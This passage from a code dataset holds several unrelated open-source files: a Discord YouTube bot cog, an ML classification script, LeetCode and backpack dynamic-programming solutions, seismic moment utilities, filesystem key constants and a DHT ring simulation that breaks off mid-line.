COPYRIGHT HOLDERS BE LIABLE \r\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION \r\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\"\"\"\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom fire.filters.youtube import findvideo\r\nfrom fire.http import Route\r\nfrom jishaku.paginators import WrappedPaginator, PaginatorEmbedInterface\r\nfrom jishaku.cog import Jishaku\r\nimport googleapiclient.discovery\r\nimport functools\r\nimport datetime\r\nimport json\r\n\r\n\r\nclass YouTube(commands.Cog, name=\"YouTube API\"):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.youtube = googleapiclient.discovery.build(\r\n 'youtube', 'v3', developerKey=bot.config['youtube']\r\n )\r\n self.loop = bot.loop\r\n\r\n def popular(self):\r\n request = self.youtube.videos().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n chart=\"mostPopular\",\r\n maxResults=5,\r\n regionCode=\"US\"\r\n )\r\n response = request.execute()\r\n videos = []\r\n for video in response.get(\"items\", []):\r\n videos.append(video)\r\n return videos\r\n\r\n async def apopular(self):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics',\r\n 'chart': 'mostPopular',\r\n 'maxResults': '5',\r\n 'regionCode': 'US'\r\n }\r\n route = Route(\r\n 'GET',\r\n '/videos',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n videos = [v for v in response.get('items', [])]\r\n return videos\r\n\r\n def video_info(self, vid):\r\n request = self.youtube.videos().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n id=vid\r\n )\r\n response = request.execute()\r\n return response\r\n\r\n async def avideo_info(self, vid: str):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics',\r\n 'id': vid\r\n }\r\n route = Route(\r\n 'GET',\r\n '/videos',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n return [v for v in response.get('items', [])]\r\n\r\n def channel_info(self, channel):\r\n if channel.startswith('UC'):\r\n request = self.youtube.channels().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n id=channel\r\n )\r\n else:\r\n request = self.youtube.channels().list(\r\n part=\"snippet,statistics\",\r\n forUsername=channel\r\n )\r\n response = request.execute()\r\n return response\r\n\r\n async def achannel_info(self, channel: str):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics'\r\n }\r\n if channel.startswith('UC'):\r\n params.update({'id': channel})\r\n else:\r\n params.update({'forUsername': channel})\r\n route = Route(\r\n 'GET',\r\n '/channels',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n return response\r\n\r\n @commands.group(name=\"yt\", aliases=['youtube'], description='YouTube commands.')\r\n async def yt(self, ctx):\r\n if ctx.invoked_subcommand:\r\n return\r\n try:\r\n videos = await self.apopular()\r\n except Exception:\r\n return await ctx.error('Failed to get trending videos.')\r\n embed = discord.Embed(title=\"Trending on YouTube (US)\", color=ctx.author.color,\r\n timestamp=datetime.datetime.now(datetime.timezone.utc))\r\n for video in videos:\r\n title = video['snippet']['title']\r\n vid = video['id']\r\n author = video['snippet']['channelTitle']\r\n authorid = video['snippet']['channelId']\r\n published = video['snippet']['publishedAt'].replace('T', ' ').split('.')[\r\n 0]\r\n duration = video['contentDetails']['duration'].replace('PT', '').replace(\r\n 'H', ' Hrs ').replace('M', ' Mins ').replace('S', 'Secs')\r\n views = format(int(video['statistics'].get('viewCount', 0)), ',d')\r\n likes = format(int(video['statistics'].get('likeCount', 0)), ',d')\r\n dislikes = format(\r\n int(video['statistics'].get('dislikeCount', 0)), ',d')\r\n comments = format(\r\n int(video['statistics'].get('commentCount', 0)), ',d')\r\n embed.add_field(name=video[\"snippet\"][\"title\"],\r\n value=f\"» Link: [{title}](https://youtu.be/{vid} 'Click here to watch the video')\\n» Author: [{author}](https://youtube.com/channel/{authorid} 'Click here to checkout {author} channel')\\n» Published: {published}\\n» Views: {views}\\n» Likes: {likes}\\n» Dislikes: {dislikes}\\n» Comments: {comments}\", inline=False)\r\n await ctx.send(embed=embed)\r\n\r\n @yt.command(name=\"info\", description=\"Retrieve info from a video URL or ID\")\r\n async def info(self, ctx, video: str):\r\n video = findvideo(video) or video\r\n try:\r\n videoinfo = await self.avideo_info(video)\r\n videoinfo = videoinfo[0]\r\n except Exception:\r\n return await ctx.error(f'Failed to fetch video. Ensure the id/url is correct.')\r\n title = videoinfo['snippet']['title']\r\n vid = videoinfo['id']\r\n author = videoinfo['snippet']['channelTitle']\r\n authorid = videoinfo['snippet']['channelId']\r\n published = videoinfo['snippet']['publishedAt'].replace('T', ' ').split('.')[\r\n 0]\r\n duration = videoinfo['contentDetails']['duration'].replace('PT', '').replace(\r\n 'H', ' Hrs ').replace('M', ' Mins ').replace('S', 'Secs')\r\n description = videoinfo['snippet']['description']\r\n paginator = WrappedPaginator(\r\n prefix='```\\nDescription (Use controls to change page)\\n', suffix='```', max_size=1895)\r\n for line in description.split('\\n'):\r\n paginator.add_line(line)\r\n views = format(\r\n int(videoinfo.get('statistics', {}).get('viewCount', 0)), ',d')\r\n likes = format(\r\n int(videoinfo.get('statistics', {}).get('likeCount', 0)), ',d')\r\n dislikes = format(\r\n int(videoinfo.get('statistics', {}).get('dislikeCount', 0)), ',d')\r\n comments = format(\r\n int(videoinfo.get('statistics', {}).get('commentCount', 0)), ',d')\r\n embed = discord.Embed(\r\n title=f\"Video info for {video}\", color=ctx.author.color, timestamp=datetime.datetime.now(datetime.timezone.utc))\r\n embed.add_field(name=videoinfo[\"snippet\"][\"title\"],\r\n value=f\"» Link: [{title}](https://youtu.be/{vid} 'Click here to watch the video')\\n» Author: [{author}](https://youtube.com/channel/{authorid} 'Click here to checkout {author} channel')\\n» Published: {published}\\n» Views: {views}\\n» Likes: {likes}\\n» Dislikes: {dislikes}\\n» Comments: {comments}\", inline=False)\r\n interface = PaginatorEmbedInterface(\r\n ctx.bot, paginator, owner=ctx.author, _embed=embed)\r\n return await interface.send_to(ctx)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(YouTube(bot))\r\n bot.logger.info(f'$GREENLoaded YouTube cog!')\r\n","repo_name":"0xacn/bot","sub_path":"cogs/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"35535106509","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nimport torch\nimport numpy as np\n\nfrom datasets.wm811k import WM811K\nfrom datasets.transforms import WM811KTransform\n\nfrom configs.task_configs import ClassificationConfig\nfrom configs.network_configs import ALEXNET_BACKBONE_CONFIGS\nfrom configs.network_configs import VGGNET_BACKBONE_CONFIGS\nfrom configs.network_configs import RESNET_BACKBONE_CONFIGS\nfrom models.alexnet import AlexNetBackbone\nfrom models.vggnet import VggNetBackbone\nfrom models.resnet import ResNetBackbone\nfrom models.head import LinearClassifier\n\nfrom tasks.classification import Classification\n\nfrom utils.loss import LabelSmoothingLoss\nfrom utils.logging import get_logger\nfrom utils.metrics import MultiAccuracy, MultiF1Score\nfrom utils.optimization import get_optimizer, get_scheduler\n\n\nAVAILABLE_MODELS = {\n 'alexnet': (ALEXNET_BACKBONE_CONFIGS, AlexNetBackbone),\n 'vggnet': (VGGNET_BACKBONE_CONFIGS, VggNetBackbone),\n 'resnet': (RESNET_BACKBONE_CONFIGS, ResNetBackbone),\n}\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n\n # Configurations\n config = ClassificationConfig.parse_arguments()\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(gpu) for gpu in config.gpus])\n num_gpus_per_node = len(config.gpus)\n world_size = config.num_nodes * num_gpus_per_node\n distributed = world_size > 1\n setattr(config, 'num_gpus_per_node', num_gpus_per_node)\n setattr(config, 'world_size', world_size)\n setattr(config, 'distributed', distributed)\n config.save()\n\n if config.distributed:\n raise NotImplementedError\n else:\n main_worker(0, config=config) # single machine, single gpu\n\n\ndef main_worker(local_rank: int, config: object):\n\n torch.cuda.set_device(local_rank)\n if config.distributed:\n raise NotImplementedError\n\n if local_rank == 0:\n logfile = os.path.join(config.checkpoint_dir, 'main.log')\n logger = get_logger(stream=False, logfile=logfile)\n else:\n logger = None\n\n in_channels = int(config.decouple_input) + 1\n num_classes = 9\n\n # 2. Dataset\n train_transform = WM811KTransform(size=config.input_size, mode=config.augmentation)\n test_transform = WM811KTransform(size=config.input_size, mode='test')\n train_set = WM811K('./data/wm811k/labeled/train/',\n transform=train_transform,\n proportion=config.label_proportion,\n decouple_input=config.decouple_input)\n valid_set = WM811K('./data/wm811k/labeled/valid/',\n transform=test_transform,\n decouple_input=config.decouple_input)\n test_set = WM811K('./data/wm811k/labeled/test/',\n transform=test_transform,\n decouple_input=config.decouple_input)\n\n # 3. Model\n BACKBONE_CONFIGS, Backbone = AVAILABLE_MODELS[config.backbone_type]\n backbone = Backbone(BACKBONE_CONFIGS[config.backbone_config], in_channels=in_channels)\n classifier = LinearClassifier(in_channels=backbone.out_channels, num_classes=num_classes)\n\n # 3-1. Load pre-trained weights (if provided)\n if config.pretrained_model_file is not None:\n try:\n backbone.load_weights_from_checkpoint(path=config.pretrained_model_file, key='backbone')\n except KeyError:\n backbone.load_weights_from_checkpoint(path=config.pretrained_model_file, key='encoder')\n finally:\n if logger is not None:\n logger.info(f\"Loaded pre-trained model from: {config.pretrained_model_file}\")\n else:\n if logger is not None:\n logger.info(\"No pre-trained model provided.\")\n\n # 3-2. Finetune or freeze weights of backbone\n if config.freeze:\n backbone.freeze_weights()\n if logger is not None:\n logger.info(\"Freezing backbone weights.\")\n\n\n # 4. Optimization\n params = [{'params': backbone.parameters()}, {'params': classifier.parameters()}]\n optimizer = get_optimizer(\n params=params,\n name=config.optimizer,\n lr=config.learning_rate,\n weight_decay=config.weight_decay,\n momentum=config.momentum\n )\n scheduler = get_scheduler(\n optimizer=optimizer,\n name=config.scheduler,\n epochs=config.epochs,\n warmup_steps=config.warmup_steps\n )\n\n # 5. Experiment (classification)\n experiment_kwargs = {\n 'backbone': backbone,\n 'classifier': classifier,\n 'optimizer': optimizer,\n 'scheduler': scheduler,\n 'loss_function': LabelSmoothingLoss(num_classes, smoothing=config.label_smoothing),\n 'distributed': config.distributed,\n 'local_rank': local_rank,\n 'checkpoint_dir': config.checkpoint_dir,\n 'write_summary': config.write_summary,\n 'metrics': {\n 'accuracy': MultiAccuracy(num_classes=num_classes),\n 'f1': MultiF1Score(num_classes=num_classes, average='macro'),\n },\n }\n experiment = Classification(**experiment_kwargs)\n\n # 6. Run (classification)\n run_kwargs = {\n 'train_set': train_set,\n 'valid_set': valid_set,\n 'test_set': test_set,\n 'epochs': config.epochs,\n 'batch_size': config.batch_size,\n 'num_workers': config.num_workers,\n 'logger': logger,\n }\n experiment.run(**run_kwargs)\n logger.handlers.clear()\n\n\nif __name__ == '__main__':\n\n np.random.seed(0)\n torch.manual_seed(0)\n torch.backends.cudnn.benchmark = True\n try:\n main()\n except KeyboardInterrupt:\n sys.exit(0)\n","repo_name":"hgkahng/WaPIRL","sub_path":"run_classification.py","file_name":"run_classification.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"} +{"seq_id":"36291833189","text":"# You are given two linked lists representing two non-negative numbers.\n# The digits are stored in reverse order and each of their nodes contain\n# a single digit.\n# Add the two numbers and return it as a linked list.\n#\n# Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n# Output: 7 -> 0 -> 8\n#\n# Definition for singly-linked list.\n# Time: O(n)\n# Space: O(1)\n\nimport argparse\nfrom model import ListNode\nfrom helper import get_linked_list_from_list\n\n\nclass Solution(object):\n @staticmethod\n def add_two_numbers(l1, l2):\n dummy = ListNode(0)\n current, carry = dummy, 0\n\n while l1 or l2:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n carry, val = divmod(val, 10)\n current.next = ListNode(val)\n current = current.next\n\n if carry == 1:\n current.next = ListNode(1)\n\n return dummy.next\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--first', dest='first', required=True, nargs='+',\n help='list of integer', type=int)\n parser.add_argument('--second', dest='second', required=True, nargs='+',\n help='list of integer', type=int)\n args = parser.parse_args()\n\n first = get_linked_list_from_list(args.first)\n second = get_linked_list_from_list(args.second)\n print(Solution().add_two_numbers(first, second))\n","repo_name":"ericdong66/leetcode-50","sub_path":"python/21.add_two_numbers.py","file_name":"21.add_two_numbers.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8689495621","text":"import numpy as np\nfrom math import exp\n\n\ndef moment_function(magnitude):\n '''\n Get moment (in Nm) from magnitude using Hanks & Kanamori (1979)\n\n :param float (or numpy.ndarray) magnitude:\n Magnitude of event\n :returns:\n Seismic Moment in Nm\n '''\n return 10. ** ((1.5 * magnitude) + 9.05)\n\n\ndef moment_magnitude_function(moment):\n '''\n For a given moment, get the moment magnitude using the formula\n of Hanks & Kanamori (1979)\n\n :param float or numpy.ndarray magnitude\n Seismic moment in Nm\n '''\n\n return (2. / 3.) * (np.log10(moment) - 9.05)\n\n\ndef calculate_taper_function(obs_threshold_moment, sel_threshold_moment,\n corner_moment, beta):\n '''\n Calculates the tapering function of the tapered Gutenberg & Richter model:\n as described in Bird & Liu (2007)::\n\n taper_function = (M_0(M_T) / M_0(M_T^{CMT}))^-beta x exp((M_0(m_T^CMT) -\n M_0(m_T)) / M_0(m_c))\n\n :param numpy.ndarray obs_threshold_moment:\n Moment of the threshold magnitude of the observed earthquake catalogue\n :param numpy.ndarray sel_threshold_moment:\n Moment of the target magnitude\n :param float corner_momnet:\n Corner moment of the Tapered Gutenberg-Richter Function\n :param float beta:\n Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n :returns:\n Relative moment rate\n '''\n argument = (obs_threshold_moment - sel_threshold_moment) /\\\n corner_moment\n if argument < -100.0:\n g_function = 0.0\n else:\n g_function = ((sel_threshold_moment / obs_threshold_moment) **\n -beta) * exp(argument)\n return g_function\n\n\ndef tapered_gutenberg_richter_cdf(moment, moment_threshold, beta,\n corner_moment):\n '''\n Tapered Gutenberg Richter Cumulative Density Function\n\n :param float or numpy.ndarray moment:\n Moment for calculation of rate\n\n :param float or numpy.ndarray moment_threshold:\n Threshold Moment of the distribution (moment rate essentially!)\n\n :param float beta:\n Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n\n :param float corner_momnet:\n Corner moment of the Tapered Gutenberg-Richter Function\n\n :returns:\n Cumulative probability of moment release > moment\n\n\n '''\n cdf = np.exp((moment_threshold - moment) / corner_moment)\n return ((moment / moment_threshold) ** (-beta)) * cdf\n\n\ndef tapered_gutenberg_richter_pdf(moment, moment_threshold, beta,\n corner_moment):\n '''\n Tapered Gutenberg-Richter Probability Density Function\n\n :param float or numpy.ndarray moment:\n Moment for calculation of rate\n\n :param float or numpy.ndarray moment_threshold:\n Threshold Moment of the distribution (moment rate essentially!)\n\n :param float beta:\n Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n\n :param float corner_momnet:\n Corner moment of the Tapered Gutenberg-Richter Function\n\n :returns:\n Absolute probability of moment release > moment\n '''\n return ((beta / moment + 1. / corner_moment) *\n tapered_gutenberg_richter_cdf(moment, moment_threshold, beta,\n corner_moment))\n","repo_name":"gem/oq-engine","sub_path":"openquake/hmtk/strain/strain_utils.py","file_name":"strain_utils.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"24638766712","text":"# · Backpack可行性背包\n# – 题面:要求不超过Target时能拼出的最大重量\n# – 记录f[i][w]=前i个物品能不能拼出重量w 14公斤\n# • BackpackV,BackpackVI,计数型背包\n# – 题面:要求有多少种方式拼出重量Target\n# – 记录f[i][w]=前i个物品有多少种方式拼出重量w\n# • BackpackII,BackpackIII,最值型背包\n# – 题面:要求能拼出的最大价值\n# – 记录f[i][w]=前i个/种物品拼出重量w能得到的最大价值\n# • 关键点\n# – 最后一步\n# • 最后一个背包内的物品是哪个 • 最后一个物品有没有进背包\n# – 数组大小和最大承重Target有关\n\n# 背包问题中,dp数组的大小跟背包总承重有关\n# 题1, 题2中,A数组中元素的顺序是重要的,问题转化是:An放不放进背包\n# 题3中, A数组中元素的顺序已经不重要了, 因为你可以重复使用元素,这是要考虑的是最后一个放进背包的元素是谁(硬币组合问题)\n\n# 题1 背包问题\n# 记录前i个物品能拼出哪些重量:1 等于前i-1个物品能拼出的重量 2 前i-1个物品能拼出的重量 + 第i个物品重量\nclass Solution:\n \"\"\"\n @param m: An integer m denotes the size of a backpack\n @param A: Given n items with size A[i]\n @return: The maximum size\n \"\"\"\n def backPack(self, m, A):\n n = len(A)\n if n == 0:\n return 0 \n \n dp = [[None for _ in range(m+1) ] for _ in range(n+1)] # 注意 m+1 n+1\n dp[0][0] = True\n \n for i in range(1, m+1):\n dp[0][i] = False\n \n for i in range(1, n+1):\n for j in range(0, m+1): # 从0开始\n dp[i][j] = dp[i-1][j] \n if j >= A[i-1]: # 一定要记住 j >= A[i-1], 不然j-A[i-1]就越界了。其实就是想拼出10kg, 如果A[i-1]=11kg, 那么A[i-1]就不能入选了。\n dp[i][j] = dp[i][j] or dp[i-1][j - A[i-1]]\n res = 0 \n for i in range(m, -1, -1):\n if dp[n][i] == True:\n res = i\n break\n return res\n \n # 背包问题 II\n# 背包问题 III\n# 原始方法(超时)- 时间优化 - 空间优化\n# 方法一:f[i][w] = max{f[i-1][w], f[i-1][w-Ai-1] + Vi-1, f[i-1][w-2Ai-1] + 2Vi-1,...}\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for x in range(1, m+1):\n f[0][x] = -1\n \n for i in range(1, n+1):\n for j in range(1, m+1):\n f[i][j] = f[i-1][j]\n k = 1\n while j >= k*A[i-1]:\n if f[i-1][j-k*A[i-1]] != -1:\n f[i][j] = max(f[i][j], f[i-1][j - k * A[i-1]] + k * V[i-1])\n \n k += 1 # 注意k不可以在if里面,不然的话k无法向后循环,后面可能还有k符合条件,但是无法到达那个k\n return max(f[n])\n \n \n# 方法二:f[i][w] = max{f[i-1][w], f[i][w-Ai-1] + Vi-1}\n# 因为这一坨 f[i-1][w-Ai-1] + Vi-1, f[i-1][w-2Ai-1] + 2Vi-1,...已经在前面算过了,就是求f[i][w-Ai-1] + Vi-1的时候, \n# f[i][w-Ai-1] + Vi-1在f[i][w] 同一行靠前面,中间差着Ai-1, 所以为了避免重复计算,时间优化,所以用f[i][w-Ai-1] + Vi-1 取代那一坨\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for x in range(1, m+1):\n f[0][x] = -1\n \n for i in range(1, n+1):\n for j in range(1, m+1):\n f[i][j] = f[i-1][j]\n if j >= A[i-1] and f[i][j-A[i-1]] != -1:\n f[i][j] = max(f[i][j], f[i][j - A[i-1]] + V[i-1])\n \n \n return max(f[n])\n# 方法三: \n# 空间优化:一维数组\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [0 for _ in range(m+1)]\n \n \n for i in range(1, n+1):\n for j in range(A[i-1],m+1):\n f[j] = max(f[j-A[i-1]] + V[i-1], f[j])\n return f[m]\n \n# 背包问题 IV\n\n# 题2 背包问题 V\n# 解法1: 2维滚动数组\nclass Solution:\n \"\"\"\n @param nums: an integer array and all positive numbers\n @param target: An integer\n @return: An integer\n \"\"\"\n def backPackV(self, nums, target):\n n = len(nums)\n if n == 0:\n return 0 \n \n dp = [[0 for _ in range(target+1)] for _ in range(2)]\n dp[0][0] = 1 \n \n \n for i in range(1, n+1):\n for j in range(target+1):\n dp[i%2][j] = dp[(i-1)%2][j]\n if j >= nums[i-1]:\n dp[i%2][j] = dp[i%2][j] + dp[(i-1)%2][j - nums[i-1]]\n \n return dp[n%2][target]\n \n# 解法2: 1维滚动数组 + 从后向前 【因为需要用到前面的旧值,如果从前向后更新,新值会覆盖需要用到的旧值】\nclass Solution:\n \"\"\"\n @param nums: an integer array and all positive numbers\n @param target: An integer\n @return: An integer\n \"\"\"\n def backPackV(self, nums, target):\n n = len(nums)\n if n == 0:\n return 0 \n \n dp = [0 for _ in range(target+1)]\n dp[0] = 1 \n \n \n for i in range(1, n+1):\n for j in range(target, -1, -1):\n if j >= nums[i-1]:\n dp[j] += dp[j - nums[i-1]]\n \n return dp[target]\n# 题3 背包问题 VI \n# 可重复使用数字 且 顺序不同算作不同组合 (变成硬币组合问题)\nclass Solution:\n \"\"\"\n @param nums: an integer array and all positive numbers, no duplicates\n @param target: An integer\n @return: An integer\n \"\"\"\n def backPackVI(self, nums, target):\n n = len(nums)\n if n == 0:\n return 0 \n f = [0] * (target+1) \n f[0] = 1 \n for i in range(1, target+1):\n for j in range(n):\n if i >= nums[j]:\n f[i] += f[i - nums[j]]\n \n return f[target]\n","repo_name":"MERCURYCOA/Algo","sub_path":"DP-背包型.py","file_name":"DP-背包型.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13371957259","text":"# encoding: utf-8\n\"\"\"\n drive.keys\n ~~~~~~~~~~\n\n This file contains the keys used by :package:`drive`.\n\"\"\"\n\nk_bootstrap_code = 'bootstrap_code'\nk_MBR = 'MBR'\nk_Partition = 'Partition'\nk_PartitionEntry = 'PartitionEntry'\nk_PartitionEntries = 'PartitionEntries'\nk_status = 'status'\n\nk_starting_chs_address = 'starting_chs_address'\nk_ignored = '__ignored__'\nk_partition_type = 'partition_type'\nk_ending_chs_address = 'ending_chs_address'\nk_first_sector_address = 'first_sector_address'\nk_first_byte_address = 'first_byte_address'\nk_number_of_sectors = 'number_of_sectors'\nk_size = 'size'\n\nk_boot_signature = 'boot_signature'\n\nk_FAT32BootSector = 'FAT32BootSector'\nk_jump_instruction = 'jump_instruction'\nk_OEM_name = 'OEM_name'\nk_bytes_per_sector = 'bytes_per_sector'\nk_sectors_per_cluster = 'sectors_per_cluster'\nk_number_of_reserved_sectors = 'number_of_reserved_sectors'\nk_number_of_FATs = 'number_of_FATs'\nk_media_descriptor = 'media_descriptor'\nk_sectors_per_track = 'sectors_per_track'\nk_number_of_heads = 'number_of_heads'\nk_number_of_hidden_sectors = 'number_of_hidden_sectors'\nk_sectors_per_FAT = 'sectors_per_FAT'\nk_drive_description = 'drive_description'\nk_version = 'version'\nk_cluster_number_of_root_directory_start =\\\n 'cluster_number_of_root_directory_start'\nk_sector_number_of_FS_info_sector = 'sector_number_of_FS_info_sector'\nk_sector_number_of_boot_sectors_backup = 'sector_number_of_boot_sectors_backup'\nk_drive_number = 'drive_number'\nk_extended_boot_signature = 'extended_boot_signature'\nk_volume_id = 'volume_id'\nk_volume_label = 'volume_label'\nk_filesystem_type = 'filesystem_type'\n\nk_FAT32FileAllocationTable = 'FAT32FileAllocationTable'\n\nk_Drive = 'Drive'\n\nk_FAT32 = 'FAT32'\nk_NTFS = 'NTFS'\nk_ExtendedPartition = 'ExtendedPartition'\n\nk_reserved = 'reserved'\n\nk_FAT32DirectoryTableEntry = 'FAT32DirectoryTableEntry'\nk_short_file_name = 'short_file_name'\nk_short_extension = 'short_extension'\nk_attribute = 'attribute'\nk_create_time_10ms = 'create_time_10ms'\nk_create_time = 'create_time'\nk_create_date = 'create_date'\nk_access_date = 'access_date'\nk_higher_cluster = 'higher_cluster'\nk_modify_time = 'modify_time'\nk_modify_date = 'modify_date'\nk_lower_cluster = 'lower_cluster'\nk_file_length = 'file_length'\n\nk_FAT32LongFilenameEntry = 'FAT32LongFilenameEntry'\nk_sequence_number = 'sequence_number'\nk_name_1 = 'name_1'\nk_type = 'type'\nk_checksum = 'checksum'\nk_name_2 = 'name_2'\nk_first_cluster = 'first_cluster'\nk_name_3 = 'name_3'\n\nk_filename = 'filename'\nk_full_path = 'full_path'\nk_path = 'path'\nk_extension = 'k_extension'\nk_cluster_list = 'cluster_list'\n\nk_NTFSBootSector = 'NTFSBootSector'\nk_cluster_number_of_MFT_start = 'cluster_number_of_MFT_start'\nk_cluster_number_of_MFT_mirror_start = 'cluster_number_of_MFT_mirror_start'\nk_clusters_per_MFT_record = 'clusters_per_MFT_record'\nk_bytes_per_MFT_record = 'bytes_per_MFT_record'\nk_clusters_per_index_record = 'clusters_per_index_record'\nk_bytes_per_index_record = 'bytes_per_index_record'\nk_serial_number = 'serial_number'\n\nk_FileRecordHeader = 'FileRecordHeader'\nk_offset_to_update_sequence = 'offset_to_update_sequence'\nk_size_of_update_sequence = 'size_of_update_sequence'\nk_logfile_sequence_number = 'logfile_sequence_number'\nk_offset_to_first_attribute = 'offset_to_first_attribute'\nk_flags = 'flags'\nk_logical_size = 'logical_size'\nk_allocated_size = 'allocated_size'\nk_base_record_index = 'base_record_index'\nk_id_of_next_attribute = 'id_of_next_attribute'\nk_number_of_this_record = 'number_of_this_record'\nk_update_sequence_number = 'update_sequence_number'\n\nk_common_header = 'common_header'\nk_attribute_type = 'attribute_type'\nk_size_of_attribute = 'size_of_attribute'\nk_is_resident = 'is_resident'\nk_length_of_name = 'length_of_name'\nk_offset_to_name = 'offset_to_name'\nk_attribute_id = 'attribute_id'\nk_resident_header = 'resident_header'\nk_size_of_attribute_content = 'size_of_attribute_content'\nk_offset_to_attribute_content = 'offset_to_attribute_content'\nk_is_indexed = 'is_indexed'\nk_non_resident_header = 'non_resident_header'\nk_starting_vcn_of_data_runs = 'starting_vcn_of_data_runs'\nk_ending_vcn_of_data_runs = 'ending_vcn_of_data_runs'\nk_offset_to_data_runs = 'offset_to_data_runs'\nk_compression_unit = 'compression_unit'\nk_initial_size = 'initial_size'\n\nk_MFT_change_time = 'MFT_change_time'\nk_access_time = 'access_time'\nk_maximum_version_number = 'maximum_version_number'\nk_version_number = 'version_number'\nk_class_id = 'class_id'\n\nk_parent_reference = 'parent_reference'\nk_filename_namespace = 'filename_namespace'\n\nk_GUID_object_id = 'GUID_object_id'\nk_GUID_birth_volume_id = 'GUID_birth_volume_id'\nk_GUID_birth_object_id = 'GUID_birth_object_id'\nk_GUID_domain_id = 'GUID_domain_id'\n","repo_name":"fnmdx111/createfile","sub_path":"drive/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29114176041","text":"from dht import *\nfrom random import randint\nfrom hashlib import sha256\nimport csv\n\n# a ring with 4096 IDs\nd = DHT(12)\n# replication degree\ndegree = 4\n# get node and file's ID\n\n\ndef get_ID(input_name):\n hash_value = sha256(input_name.encode())\n hash_value = hash_value.hexdigest()\n # print(hash_value)\n # print(int(hash_value, 16))\n return int(int(hash_value, 16) % 4096)\n\n\n# Add nodes\nIP_file = open(\"data/nodes.txt\")\nfor IP in IP_file:\n # print(IP)\n IP = IP.rstrip('\\n')\n n = Node(get_ID(IP.rstrip('\\n')))\n # print(n.ID)\n d.join(n)\nIP_file.close()\n\n# print(\"\\nDHT has \" + str(d._numNodes) + \" nodes\")\n\n\nd.updateAllFingerTables()\n\n\n# Store Objects\nname_file = open(\"data/files.txt\")\nfor name in name_file:\n # print(name.rstrip('\\n'))\n name = name.rstrip('\\n')\n name_ID = get_ID(name)\n d.store(d._startNode, name_ID, name, degree)\n\n# Get all the stored item\nstored_item = []\nstart_node = d._startNode\ntemp0 = [str(start_node.ID)]\ntemp0 = temp0 + list(start_node.data.values())\nstored_item.append(temp0)\nnode = start_node.fingerTable[0]\nwhile(node != start_node):\n # print(node.ID)\n temp = [str(node.ID)]\n temp = temp + list((node.data.values()))\n stored_item.append(temp)\n node = node.fingerTable[0]\n # print(node.data.values())\n # node = node.fingerTable[0]\n\n# # print(stored_item)\n\n# Write all the stored item into csv file\nwith open(\"ring_structure_with_rep.csv\", 'w') as file:\n writer = csv.writer(file, delimiter='\\t')\n for item in stored_item:\n writer.writerow(item)\n\n# Do quries in query file\nhops = []\nwith open(\"data/queries.txt\") as file:\n for query in file:\n query = query.rstrip(\"\\n\")\n temp = query.split(\",\")\n start_IP = temp[0]\n key = temp[1]\n # First find the start node\n start_node = d.findNode(d._startNode, get_ID(start_IP))\n # print(start_node.ID)'\n # Second get the hops\n hop = d.lookup(start_node, get_ID(key), degree)\n if hop[-1] != None:\n hop_new = [node.ID for node in hop]\n else:\n hop_new = [node.ID for node in hop[:-1]]\n hop_new.append(\"None\")\n hops.append(hop_new)\n\nwith open(\"routes_with_rep.csv\", 'w') as file:\n writer = csv.writer(file, delimiter='\\t')\n for item in hops:\n writer.writerow(item)\n\n# print(\"malicious1\" + str(get_ID(\"24.121.88.210\")))\n# print(\"malicious2\" + str(get_ID(\"184.15.113.235\")))\n# print(\"start\")\n# d.lookup(d.findNode(d._startNode, 2858), get_ID(\"note30ef7dde.mp3\"), 